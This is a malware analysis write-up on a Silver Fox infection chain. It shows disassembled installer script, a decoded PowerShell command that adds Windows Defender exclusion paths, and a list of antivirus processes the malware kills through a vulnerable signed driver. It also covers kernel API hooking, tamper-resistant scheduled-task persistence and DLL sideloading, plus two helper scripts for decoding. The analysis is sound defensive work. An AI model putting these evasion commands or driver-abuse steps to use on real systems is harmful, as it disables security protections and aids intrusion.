StackCount = 5        pop ; StackCount = 4        pushtype Type30 ; StackCount = 5        pushtype Type30 ; StackCount = 6        pushtype S32 ; StackCount = 7        assign Var7, S32(1)        pushvar Var6 ; StackCount = 8        call SETARRAYLENGTH        pop ; StackCount = 7        pop ; StackCount = 6        assign Var6[0], S32(34)        assign Var5, Var6        pop ; StackCount = 5        pushvar Var4 ; StackCount = 6        call STRFROMCODE        pop ; StackCount = 5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(16)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(65)        assign Var8[1], S32(100)        assign Var8[2], S32(100)        assign Var8[3], S32(45)        assign Var8[4], S32(77)        assign Var8[5], S32(112)        assign Var8[6], S32(80)        assign Var8[7], S32(114)        assign Var8[8], S32(101)        assign Var8[9], S32(102)        assign Var8[10], S32(101)        assign Var8[11], S32(114)        assign Var8[12], S32(101)        assign Var8[13], S32(110)        assign Var8[14], S32(99)        assign Var8[15], S32(101)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call 
SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(32)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(14)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(45)        assign Var8[1], S32(69)        assign Var8[2], S32(120)        assign Var8[3], S32(99)        assign Var8[4], S32(108)        assign Var8[5], S32(117)        assign Var8[6], S32(115)        assign Var8[7], S32(105)        assign Var8[8], S32(111)        assign Var8[9], S32(110)        assign Var8[10], S32(80)        assign Var8[11], S32(97)        assign Var8[12], S32(116)        assign Var8[13], S32(104)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(32)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call 
STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(25)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(67)        assign Var8[1], S32(58)        assign Var8[2], S32(92)        assign Var8[3], S32(85)        assign Var8[4], S32(115)        assign Var8[5], S32(101)        assign Var8[6], S32(114)        assign Var8[7], S32(115)        assign Var8[8], S32(92)        assign Var8[9], S32(80)        assign Var8[10], S32(117)        assign Var8[11], S32(98)        assign Var8[12], S32(108)        assign Var8[13], S32(105)        assign Var8[14], S32(99)        assign Var8[15], S32(92)        assign Var8[16], S32(68)        assign Var8[17], S32(111)        assign Var8[18], S32(99)        assign Var8[19], S32(117)        assign Var8[20], S32(109)        assign Var8[21], S32(101)        assign Var8[22], S32(110)        assign Var8[23], S32(116)        assign Var8[24], S32(115)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; 
StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(44)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(32)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; 
StackCount = 4        pushtype WideString ; StackCount = 5        assign Var5, Var4        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(13)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(67)        assign Var8[1], S32(58)        assign Var8[2], S32(92)        assign Var8[3], S32(67)        assign Var8[4], S32(110)        assign Var8[5], S32(100)        assign Var8[6], S32(111)        assign Var8[7], S32(109)        assign Var8[8], S32(54)        assign Var8[9], S32(46)        assign Var8[10], S32(115)        assign Var8[11], S32(121)        assign Var8[12], S32(115)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(39)        assign Var7, Var8        pop ; StackCount = 7      
  pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype Type30 ; StackCount = 7        pushtype Type30 ; StackCount = 8        pushtype S32 ; StackCount = 9        assign Var9, S32(1)        pushvar Var8 ; StackCount = 10        call SETARRAYLENGTH        pop ; StackCount = 9        pop ; StackCount = 8        assign Var8[0], S32(34)        assign Var7, Var8        pop ; StackCount = 7        pushvar Var6 ; StackCount = 8        call STRFROMCODE        pop ; StackCount = 7        pop ; StackCount = 6        add Var5, Var6        pop ; StackCount = 5        assign Var4, Var5        pop ; StackCount = 4        pushtype BOOLEAN ; StackCount = 5        pushtype Pointer ; StackCount = 6        setptr Var6, Var1        pushtype U8_4 ; StackCount = 7        assign Var7, U8_4(1)        pushtype S32 ; StackCount = 8        assign Var8, S32(0)        pushtype UnicodeString_2 ; StackCount = 9        assign Var9, String_3("")        pushtype UnicodeString_2 ; StackCount = 10        pushtype WideString ; StackCount = 11        assign Var11, Var3        pushtype UnicodeString_2 ; StackCount = 12        pushtype Type30 ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype S32 ; StackCount = 15        assign Var15, S32(1)        pushvar Var14 ; StackCount = 16        call SETARRAYLENGTH        pop ; StackCount = 15        pop ; StackCount = 14        assign Var14[0], S32(32)        assign Var13, Var14        pop ; StackCount = 13        pushvar Var12 ; StackCount = 14        call STRFROMCODE        pop ; StackCount = 13        pop ; StackCount = 12        add Var11, Var12        pop ; StackCount = 11        add Var11, Var4        assign Var10, Var11        pop ; StackCount = 10        pushtype UnicodeString_2 ; StackCount = 11        assign Var11, Var2        pushvar Var5 ; StackCount = 12    
    call EXEC        pop ; StackCount = 11        pop ; StackCount = 10        pop ; StackCount = 9        pop ; StackCount = 8        pop ; StackCount = 7        pop ; StackCount = 6        pop ; StackCount = 5        pop ; StackCount = 4        pushtype S32 ; StackCount = 5        assign Var5, S32(4000)        call SLEEP        pop ; StackCount = 4loc_ead:        ret
The recovered contents of all the ASCII-code arrays are:

  1. Array 1 (14 bytes) ASCII codes: 112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 46, 101, 120, 101 String: "powershell.exe"

  2. Array 2 (8 bytes) ASCII codes: 45, 67, 111, 109, 109, 97, 110, 100 String: "-Command"

  3. Array 3 (1 byte) ASCII code: 34 String: """

  4. Array 4 (16 bytes) ASCII codes: 65, 100, 100, 45, 77, 112, 80, 114, 101, 102, 101, 114, 101, 110, 99, 101 String: "Add-MpPreference"

  5. Array 5 (1 byte) ASCII code: 32 String: " "

  6. Array 6 (14 bytes) ASCII codes: 45, 69, 120, 99, 108, 117, 115, 105, 111, 110, 80, 97, 116, 104 String: "-ExclusionPath"

  7. Array 7 (1 byte) ASCII code: 32 String: " "

  8. Array 8 (1 byte) ASCII code: 39 String: "'"

  9. Array 9 (25 bytes) ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115 String: "C:\Users\Public\Documents"

  10. Array 10 (1 byte) ASCII code: 39 String: "'"

  11. Array 11 (1 byte) ASCII code: 44 String: ","

  12. Array 12 (1 byte) ASCII code: 32 String: " "

  13. Array 13 (1 byte) ASCII code: 39 String: "'"

  14. Array 14 (13 bytes) ASCII codes: 67, 58, 92, 67, 110, 100, 111, 109, 54, 46, 115, 121, 115 String: "C:\Cndom6.sys"

  15. Array 15 (1 byte) ASCII code: 39 String: "'"

  16. Array 16 (1 byte) ASCII code: 34 String: """

  17. Array 17 (1 byte) ASCII code: 32 String: " "

When Windows Defender is running, this function adds two paths to the Windows Defender exclusion list: C:\Users\Public\Documents and C:\Cndom6.sys. The PowerShell command that is finally executed is: powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents','C:\Cndom6.sys'". This lets the malware run from the excluded paths without being detected by Windows Defender, a common evasion technique. The function first calls "ISDEFENDERRUNNING" to check whether Defender is running (i.e. whether the MsMpEng.exe process exists) and only adds the exclusions when it is. In local testing, running the sample while Windows Defender was running (MsMpEng.exe present) reproduced this behaviour; without Defender running it did not occur, as shown below:
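Both array listings above (ISDEFENDERRUNNING and ADDDEFENDEREXCLUSION) were recovered by hand from the `assign VarN[i], S32(code)` ... `call STRFROMCODE` pattern. The following helper, an added example and not part of the original post or of the sample, automates that recovery on the textual IFPS disassembly; the embedded listing is a constructed excerpt in the same format (covering the "root", "\" and "MsMpEng.exe" arrays).

```python
"""Recover the strings that the Inno Setup script (CompiledCode.bin) builds
at run time from integer arrays.

In the IFPS disassembly every string is hidden as a Type30 (integer) array
filled one element at a time and turned into text with STRFROMCODE.  This
helper walks the textual disassembly, collects each array fill and emits the
decoded string when a `call STRFROMCODE` consumes it.  It accepts both the
run-together form of the listing (instructions separated by runs of spaces)
and one instruction per line."""
import re

ASSIGN_ELEMENT_RE = re.compile(r"assign (Var\d+)\[(\d+)\], S32\((\d+)\)")
STRFROMCODE_RE = re.compile(r"call STRFROMCODE\b")


def split_instructions(listing: str) -> list[str]:
    """Split a listing into single instructions (newline or 2+ spaces)."""
    return [ins.strip() for ins in re.split(r"\n|\s{2,}", listing) if ins.strip()]


def decode_strfromcode(listing: str) -> list[str]:
    """Return the strings produced by each STRFROMCODE call, in order."""
    decoded: list[str] = []
    fill_var = None            # array variable currently being filled
    fill: dict[int, str] = {}  # element index -> character
    for ins in split_instructions(listing):
        m = ASSIGN_ELEMENT_RE.match(ins)
        if m:
            var, idx, code = m.group(1), int(m.group(2)), int(m.group(3))
            # A new array starts when a different variable is filled, or when
            # the same variable is re-filled from an index already seen.
            if var != fill_var or idx in fill:
                fill_var, fill = var, {}
            fill[idx] = chr(code)
        elif STRFROMCODE_RE.match(ins) and fill:
            decoded.append("".join(fill[i] for i in sorted(fill)))
            fill_var, fill = None, {}
    return decoded


# Constructed excerpt in the listing's format: the first array is written in
# the run-together form, the others one instruction per line.
SAMPLE_LISTING = """\
pushtype S32 ; StackCount = 12        assign Var12, S32(4)        pushvar Var11 ; StackCount = 13        call SETARRAYLENGTH        pop ; StackCount = 12        pop ; StackCount = 11        assign Var11[0], S32(114)        assign Var11[1], S32(111)        assign Var11[2], S32(111)        assign Var11[3], S32(116)        assign Var10, Var11        pop ; StackCount = 10        pushvar Var9 ; StackCount = 11        call STRFROMCODE        pop ; StackCount = 10
assign Var12, S32(1)
call SETARRAYLENGTH
assign Var11[0], S32(92)
assign Var10, Var11
pushvar Var9 ; StackCount = 11
call STRFROMCODE
assign Var10, S32(11)
call SETARRAYLENGTH
assign Var9[0], S32(77)
assign Var9[1], S32(115)
assign Var9[2], S32(77)
assign Var9[3], S32(112)
assign Var9[4], S32(69)
assign Var9[5], S32(110)
assign Var9[6], S32(103)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pushvar Var6 ; StackCount = 9
call STRFROMCODE
"""

if __name__ == "__main__":
    for n, s in enumerate(decode_strfromcode(SAMPLE_LISTING), 1):
        print(f"Array {n} ({len(s)} bytes): {s!r}")
```

Feeding the full CompiledCode.txt to decode_strfromcode yields every hidden string in execution order, from which the WQL query and the Add-MpPreference command line above can be reassembled.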


B.) men.exe


SHA-256: 305a1c784db4e88267f1d35b914b6ce4702f2b1196c1cdf14c024d63d1d4871f. This program is packed with the Themida protector, as shown below:

After men.exe starts, it launches C:\Users\Public\Documents\funzip.exe, as shown below:

The command line of the launched funzip.exe process is: C:\Users\Public\Documents\funzip.exe x "C:\Users\Public\Documents\x86-Microsoft-Windowsdata\tree.exe" -pServer8888 -o"C:\Users\Public\Documents\x86-Microsoft-Windowsdata" -y, i.e. it extracts tree.exe into the x86-Microsoft-Windowsdata directory using the password "Server8888", as shown below:

According to its file header, tree.exe is actually an encrypted Zip archive; extracting it yields KANG.exe and Shell.log, as shown below:

(According to its file header, Shell.log is also an encrypted Zip archive with the same password "Server8888"; extracting it yields StartMenuExperienceHostker.exe, WUDFCompanionHoste.exe and log.dll, which are analysed below.)
men.exe launches funzip.exe to extract the encrypted Zip archive tree.exe, creating and dropping KANG.exe, as shown below:

men.exe then checks whether KANG.exe is already running and keeps relaunching it, as shown below:

At the same time, we observed that men.exe attempts to inject readable and executable memory into the svchost.exe process, as shown below:

men.exe then drops and loads the driver C:\Cndom6.sys (SHA-256: 8c12407a40eab287a8281be64665b1e72b0e91b2daf84030a1a15dc280e5dbf1; signer: "Beijing Tianshui Technology Co., Ltd."), as shown below:

This driver uses the InfinityHook technique to hook kernel APIs; its analysis is deferred to the StartMenuExperienceHostker.exe section below.

C.) KANG.exe


SHA-256: 9ace6a1e4bee5834be38b4c2fd26780d1fcc18ea9d58224e31d6382c19e53296
First, in the sample's main function we see that at Line 34-83 it initialises the list v23, defining 25 security-software processes to be terminated later, mainly:
  1. 360 family (360 Safe Guard, 360 Antivirus, 360 Emergency Kit, 360 Total Security and related products): ZhuDongFangYu.exe, 360tray.exe, 360sd.exe, 360rp.exe, 360Tray.exe, 360Safe.exe, 360rps.exe, SuperKillller.exe, QHActiveDefense.exe, QHSafeTray.exe
  2. Tencent PC Manager: QMDL.exe, QMPersonalCenter.exe, QQPCPatch.exe, QQPCRealTimeSpeedup.exe, QQPCRTP.exe, QQPCTray.exe, QQRepair.exe
  3. Kingsoft Antivirus (Duba): kxescore.exe, kxecenter.exe
  4. Huorong Internet Security: HipsMain.exe, HipsTray.exe, HipsDaemon.exe
  5. Lenovo PC Manager: LenovoTray.exe, LAVService.exe
  6. Windows Defender: MsMpEng.exe
Then, at Line 85, the sample obtains a device handle from sub_14004BF20 and continuously enumerates processes to obtain the PID of each targeted process (th32ProcessID; v16 is a pointer to the PID). At Line 111 it sends control code 0xB822200C together with the PID (&v16) to that device via DeviceIoControl,
as shown below:

Entering sub_14004BF20, we find that at Line 62 it processes 35400 bytes of data from &unk_140029490 (the driver file) and at Line 64 calls sub_14004C6D0 to load the driver, as shown below:

The 35400 bytes of data from &unk_140029490 (the driver file) have an MZ header and a PE header and are confirmed to be the STProcessMonitor Driver that the sample actually drops and loads (SHA-256: 70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b), as shown below:

Local testing successfully reproduced this driver-loading behaviour, as shown below:

The driver passed WHQL certification and carries digital signatures issued by "Safetica Technologies s.r.o." and "Microsoft Windows Hardware Compatibility Publisher", signed on May 9, 2025 at 11:43:46, which is quite recent, as shown below:

sub_14004C6D0 is responsible for registering and loading the driver through the registry driver/service keys; the relevant registry-operation code and strings are shown below:

Now back to the IOCTL 0xB822200C that KANG.exe sends to the STProcessMonitor Driver's "\\.\STProcessMonitorDriver" device: next we analyse STProcessMonitor Driver to find out what IOCTL 0xB822200C does.

The STProcessMonitor Driver first checks the operating-system version; if the system is Windows 8 (version 6.2) or later, it sets a specific memory pool type and flags. It then calls IoCreateDevice to create a device object named "\Device\STProcessMonitorDriver" and IoCreateSymbolicLink to create the symbolic link "\DosDevices\STProcessMonitorDriver", so that user-mode applications can reach the driver through either name. Then come the key IRPs:
      DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)&sub_140001A10;
      DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)&sub_140001A10;
      DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)&sub_140001B70;
      DriverObject->DriverUnload = (PDRIVER_UNLOAD)sub_1400021F0;
The driver sets dispatch routines for the key IRPs (I/O request packets): IRP_MJ_CREATE (0) handles requests to open the device; IRP_MJ_CLOSE (2) handles requests to close it; IRP_MJ_DEVICE_CONTROL (14) handles device control operations (IOCTLs), the main channel between user mode and a kernel-mode driver. It also sets a DriverUnload routine to clean up resources when the driver is unloaded, as shown below:

So sub_140001B70 is where we need to look.
In sub_140001B70, case 0xB822200C mainly does: open the process / obtain a process handle => terminate the process => close/release the process handle; its purpose is to terminate processes, as shown below:

The driver exposes this process-termination IOCTL to user mode without any validation of the target, which lets an attacker terminate arbitrary processes from kernel mode. When the sample was found, this vulnerable driver was not flagged by any security product on VirusTotal; at the time of writing it is flagged by one, as shown below:
Information from VirusTotal Relations indicates that the driver is still being distributed, as shown below:

The STProcessMonitor Driver used here had not been used before. Since no record of this driver could be found on the Internet, in open-source repositories or in vulnerability databases, and VirusTotal Relations shows it is still being distributed (i.e. it may still be in active use and distribution), we submitted it to the CVE database and it was assigned CVE-2025-70795. This suggests that this Silver Fox group may actively hunt for and discover brand-new vulnerable drivers in the wild.
To round off, here are KANG.exe and the STProcessMonitor Driver's handling of IOCTL 0xB822200C side by side in one picture, as shown below:


D.) StartMenuExperienceHostker.exe


SHA-256: cf111e28e40d20c9695e191c66b11882049c9559d5b4f2ed2090cf4626fdba39. From the StartAddress function of StartMenuExperienceHostker.exe we observe two main functions:
  1. Launching WUDFCompanionHoste.exe
  2. Dropping and loading the driver C:\Cndom6.sys to implement kernel API hooking with the InfinityHook technique
In detail:
i) Launching and relaunching WUDFCompanionHoste.exe. The sample first loops over the running processes (their szExeFile), looking for the value stored in byte_841CD0 (i.e. "WUDFCompanionHoste.exe") to obtain the PID of the "WUDFCompanionHoste.exe" process (th32ProcessID is the PID pointer), as shown below:

It then calls sub_843220(th32ProcessID), which suspends every thread of that process via SuspendThread (Win32 API) (error handling further down is not shown: if suspending a thread fails or the thread was already suspended, its previous state is restored immediately to avoid double suspension), as shown below:

Next it calls sub_8432F0(th32ProcessID), which dynamically resolves NtResumeProcess (NT API) from ntdll.dll via GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtResumeProcess"); if that succeeds it calls NtResumeProcess to resume all threads of the process, and afterwards tries once more to resume them with ResumeThread (Win32 API), as shown below:

After these steps it assigns the path of WUDFCompanionHoste.exe to CmdLine and calls WinExec(CmdLine, 0) to start WUDFCompanionHoste.exe again, as shown below:

ii) Dropping and loading the driver C:\Cndom6.sys for InfinityHook-based kernel API hooking. It creates a driver/service entry (ServiceName="Cndom6"; BinaryPath="C:\Cndom6.sys") and opens the device "\\.\Cndom6", as shown below:

Local testing successfully reproduced this driver-loading behaviour, as shown below:

The sample then tries to send IOCTL 0x222180 to the driver's device; if that fails it goes on to send IOCTL 0x229390, as shown below:
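The control codes above (0xB822200C for STProcessMonitor Driver, 0x222180 and 0x229390 here, plus the 0x22218C and 0x222190 codes found later in Cndom6) pack several fields that are worth reading out. The following helper, an added example and not code from the original post or from either driver, decodes them with the CTL_CODE layout from winioctl.h and highlights the field a defender cares about most: the access requirement the I/O manager enforces before the request reaches the driver.

```python
"""Decode Windows IOCTL control codes into their CTL_CODE fields.

winioctl.h / ntddk.h define
    CTL_CODE(DeviceType, Function, Method, Access)
        = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method

Two things follow directly from the fields: whether the I/O manager demands
any access right on the caller's handle before dispatching the request
(Access), and whether several codes belong to one driver's command family
(shared DeviceType, neighbouring Function numbers)."""
from dataclasses import dataclass

METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
FILE_DEVICE_UNKNOWN = 0x22          # generic device type used by many drivers
FIRST_VENDOR_DEVICE_TYPE = 0x8000   # device types >= 0x8000 are vendor-defined
FIRST_VENDOR_FUNCTION = 0x800       # function numbers >= 0x800 are vendor-defined


@dataclass(frozen=True)
class Ioctl:
    code: int
    device_type: int
    access: int
    function: int
    method: int

    def describe(self) -> str:
        dev = ("FILE_DEVICE_UNKNOWN" if self.device_type == FILE_DEVICE_UNKNOWN
               else f"0x{self.device_type:X}")
        return (f"0x{self.code:08X}: DeviceType={dev} Function=0x{self.function:X} "
                f"{METHOD_NAMES[self.method]} {ACCESS_NAMES[self.access]}")


def decode_ioctl(code: int) -> Ioctl:
    """Split a 32-bit control code into its CTL_CODE fields."""
    return Ioctl(code=code & 0xFFFFFFFF,
                 device_type=(code >> 16) & 0xFFFF,
                 access=(code >> 14) & 0x3,
                 function=(code >> 2) & 0xFFF,
                 method=code & 0x3)


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """The CTL_CODE macro itself; inverse of decode_ioctl."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


def needs_no_handle_access(ioctl: Ioctl) -> bool:
    """True when Access is FILE_ANY_ACCESS: the I/O manager forwards the
    request whatever access rights the device handle was opened with, so the
    driver's dispatch routine is the only place where a privilege check or a
    target check (which STProcessMonitor Driver lacks) can happen.  Whether a
    non-administrator can open the device at all is decided separately by the
    device object's security descriptor."""
    return ioctl.access == 0


def group_by_driver(codes: list[int]) -> dict[int, list[int]]:
    """Group codes by DeviceType and sort their Function numbers, which shows
    a driver's command family even when only some codes were sent."""
    groups: dict[int, list[int]] = {}
    for c in codes:
        d = decode_ioctl(c)
        groups.setdefault(d.device_type, []).append(d.function)
    return {k: sorted(v) for k, v in groups.items()}


# Control codes taken from the analysis above.
KILL_PROCESS_IOCTL = 0xB822200C                          # STProcessMonitor Driver
CNDOM6_IOCTLS = [0x222180, 0x229390, 0x22218C, 0x222190]  # Cndom6.sys

if __name__ == "__main__":
    for code in [KILL_PROCESS_IOCTL, *CNDOM6_IOCTLS]:
        print(decode_ioctl(code).describe())
    print(group_by_driver(CNDOM6_IOCTLS))
```

The kill IOCTL decodes to a vendor device type 0xB822, vendor function 0x803, METHOD_BUFFERED and FILE_ANY_ACCESS, so nothing outside the driver's own dispatch code restricts who may issue it; the three 0x2221xx Cndom6 codes share DeviceType FILE_DEVICE_UNKNOWN and consecutive function numbers 0x860, 0x863, 0x864, while 0x229390 is the only one that requires FILE_WRITE_ACCESS.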

Next we analyse Cndom6 to find out what IOCTL 0x222180 does.
First, in DriverEntry, the driver calls IoCreateDevice to create a device object named "\Device\Cndom6" and IoCreateSymbolicLink to create the symbolic link "\??\Cndom6", so that user-mode applications can reach the driver through either name. Then come the key IRPs:
      DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)&sub_140003A9C;
      DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)&sub_140003A9C;
      DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)&sub_14000338C;
The driver sets dispatch routines for the key IRPs (I/O request packets): IRP_MJ_CREATE (0) handles requests to open the device; IRP_MJ_CLOSE (2) handles requests to close it; IRP_MJ_DEVICE_CONTROL (14) handles device control operations (IOCTLs), the main channel between user mode and a kernel-mode driver, as shown below:

So sub_14000338C is where we need to look.
In sub_14000338C, case 0x222180 mainly sets the flag byte_140072AED to 1, as shown below: Looking at the cross-references to this flag, we find a function that, after checking that the flag is set, swaps function pointers dynamically to hook a kernel function, probably handling KeGetCurrentThread to hide threads or protect thread execution information, as shown below:

Looking back at the driver's other capabilities, from DriverEntry => if ( sub_140001A10() ) => if ( ... && sub_14000202C() ) we find that the driver calls sub_140004A3C to obtain the addresses of kernel APIs such as NtTraceControl, KeQueryPerformanceCounter, NtQuerySystemInformation, NtOpenProcess and NtOpenThread, as shown below: Taking NtQuerySystemInformation as an example, the cross-references to qword_140007338 lead to sub_140003FC4, the hook function for the NtQuerySystemInformation API, used for process hiding; its switch flag is dword_140007398, as shown below: Cross-references show that dword_140007398 is controlled by IOCTL 0x22218C (not sent by this sample) and assigned in sub_140004D1C, as shown below:

Likewise, taking NtOpenProcess as an example, the cross-references to qword_140007340 lead to sub_140003F40, the hook function for the NtOpenProcess API, used for process-handle protection; its switch flag is dword_140041D78, as shown below: Cross-references show that dword_140041D78 is controlled by IOCTL 0x222190 (not sent by this sample) and assigned in sub_140004C68, as shown below:

The invoker (launcher) function sub_140001940 that triggers the hooks on the NtQuerySystemInformation, NtOpenProcess and NtDuplicateObject APIs is shown below:

** We also found that once the sample has run completely, StartMenuExperienceHostker.exe is added to the scheduled-task startup items under the task name "WindowsPowerShell.WbemScripting.WindowsData", as shown below: The sample also changes the DACL of the task's XML file C:\Windows\System32\Tasks\WindowsPowerShell.WbemScripting.WindowsData, so that when the system tries to delete the task it fails for lack of permissions, as shown below: Specifically, when the task is deleted, the actual executor svchost.exe gets an access-denied error (ACCESS_DENIED) while deleting the task's XML file, as shown below: After the DACL of the XML file is restored, the scheduled task can be deleted normally.


E.) WUDFCompanionHoste.exe=>log.dll


log.dll SHA-256: a14b681ec50328d3ac04f76ac18ef96fb7176425ff96325e2099ea57df3a1998. This is a DLL hijacking / DLL sideloading / "white plus black" pair: after WUDFCompanionHoste.exe starts, it tries to load code from log.dll, as shown below: WUDFCompanionHoste.exe actually loads the GenericLogImpl export of log.dll:

It first reads the file Server.log, decrypts it with RC4 using the key "??Bid@locale@std", and then executes the decrypted WinOs remote-control module; the relevant code is shown below:

